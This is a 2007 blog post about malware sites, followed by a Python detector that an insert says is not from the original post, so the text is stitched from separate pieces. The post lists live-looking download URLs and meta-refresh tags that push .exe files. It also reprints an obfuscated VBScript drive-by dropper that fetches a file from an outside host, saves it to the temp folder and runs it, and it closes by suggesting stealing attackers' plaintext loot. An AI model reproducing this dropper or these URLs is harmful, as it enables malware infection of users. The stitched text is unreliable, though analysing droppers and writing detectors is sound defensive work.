Saturday, May 05, 2007

Malware sites

I was poking around the net and found some interesting malware sites:

Please don't try any of them unless you know what you are doing

http://jokeonlineworld.com/gift.html
< meta equiv="Refresh" content="0; URL=http://jokeonlineworld.com/gift.exe">


http://jokeonlineworld.com/
< meta equiv="Refresh" content="0; URL=http://jokeonlineworld.com/install.exe">


http://sequestro.t35.com/
"http://www.blogger.com/exigencias.exe" Read all the requirements carefully.

And another type, which uses VBScript:
http://www.youshini.com/jp/789.htm
on error resume next
Dim haotian
Set y = Nothing
ppp="obj"
ppp1="ect"
ppp2=ppp&ppp1
Set data = document.createElement(ppp2,"")
data.setAttribute ("classid"), ("clsid:BD96C556-65A3-11D0-983A-00C04FC29E36")
bbs ="Micro"
bbs0 ="delm"
bbs1 ="soft.XMLHTTP"
bbs2 =bbs&bbs1
result = Null And Null
Set x = data.CreateObject(bbs2,"")
set mm = data.createobject("Adodb.Stream","")
mm.type = 1
mm.open
url = "http://www.453787.com/jp/photo1.exe"
ysha="GET"
x.Open ysha, url, False
x.Send
exe="haotian.bat"
bbp1 ="Scrip"
bbp2 ="ting.FileSystem"
bbp3 ="Object"
bbp =bbp1&bbp2&bbp3
mm.write x.responseBody
set F = data.createobject(bbp,"")
Set T = Nothing
set tmp = F.GetSpecialFolder(2)
exe= F.BuildPath(tmp,exe)
mm.savetofile exe,2
mm.close
set Bb = data.createobject("Shell.Application","")
Bb.ShellExecute exe,"","","open",0


A little more Googling led me to this
http://malware.hiperlinks.com.br/cgi/submit-agressive?action=list&type=agressive
which holds tons of malware sites; most of them use the above two techniques, embedding the download inside a script or a Flash file, or simply posting the link.

Certainly most of this malware is coded in different ways and has various features, such as keylogging, reverse connect, spawning a port, sending credentials over email or to IRC, etc. I'm not surprised they use scripts to force the victim to download their babies, but using < meta equiv="Refresh" content="0; URL=http://url"> is indeed pretty cool, because it will be executed even if you disable JavaScript in the browser. I guess if it is possible to change the exe to some other common MIME type that a browser will download automatically, such as gif, swf, etc., that would make the whole game more serious and horrible.
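As an added example (not code from the original post or from any of the sites above), a small Python checker for the two delivery techniques described: it flags meta refreshes whose target ends in an executable extension, and it reassembles the split string literals in the VBScript so the ProgIDs handed to CreateObject can be matched. The sample page, the script fragment and the placeholder host are constructed.

```python
import re

# Constructed samples modelled on the two techniques quoted in the post
# (placeholder host, not one of the sites listed above).
META_PAGE = '<meta http-equiv="Refresh" content="0; URL=http://malware.invalid/gift.exe">'
VBS_PAGE = '''ppp="obj"
ppp1="ect"
ppp2=ppp&ppp1
bbs ="Micro"
bbs1 ="soft.XMLHTTP"
bbs2 =bbs&bbs1
Set x = data.CreateObject(bbs2,"")
set mm = data.createobject("Adodb.Stream","")
set Bb = data.createobject("Shell.Application","")'''

BINARY_EXT = (".exe", ".scr", ".bat", ".com", ".pif")
# ProgIDs the quoted dropper chains together to fetch, write and launch a file.
DROPPER_IDS = {"microsoft.xmlhttp", "adodb.stream", "scripting.filesystemobject", "shell.application"}
META_RE = re.compile(r'<meta[^>]*(?:http-)?equiv\s*=\s*"?refresh"?[^>]*'
                     r'content\s*=\s*"\s*\d+\s*;\s*url\s*=\s*([^"\s>]+)', re.I)
ASSIGN_RE = re.compile(r'^\s*(?:set\s+)?(\w+)\s*=\s*(.+?)\s*$', re.I)   # name = expr
CONCAT_RE = re.compile(r'^(?:"[^"]*"|\w+)(?:\s*&\s*(?:"[^"]*"|\w+))*$')  # literals & names
TOKEN_RE = re.compile(r'"([^"]*)"|(\w+)')
CALL_RE = re.compile(r'\.create(?:object|element)\s*\(\s*("?)([\w.]+)\1', re.I)

def meta_refresh_to_binary(html):
    # Meta-refresh targets that end in an executable extension.
    return [u for u in META_RE.findall(html) if u.lower().endswith(BINARY_EXT)]

def resolve_strings(script):
    # Fold VBScript string literals and & concatenations into a name -> value map.
    names = {}
    for line in script.splitlines():
        m = ASSIGN_RE.match(line)
        if not m or not CONCAT_RE.match(m.group(2)):
            continue
        parts = []
        for literal, ident in TOKEN_RE.findall(m.group(2)):
            if ident and ident not in names:
                break        # not a pure string expression; leave it unresolved
            parts.append(names[ident] if ident else literal)
        else:
            names[m.group(1)] = "".join(parts)
    return names

def dropper_indicators(script):
    # CreateObject/createElement arguments, with split strings reassembled first.
    names = resolve_strings(script)
    args = (a if q else names.get(a, "") for q, a in CALL_RE.findall(script))
    return {a.lower() for a in args if a.lower() in DROPPER_IDS}
```

Run `meta_refresh_to_binary` over a fetched page and `dropper_indicators` over each inline script block; a hit on either is the pattern the sites listed above use.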

However, it is so funny to see how they work, and it is easy to steal what the attackers have collected, since most of the cracked stuff is stored in plain text.
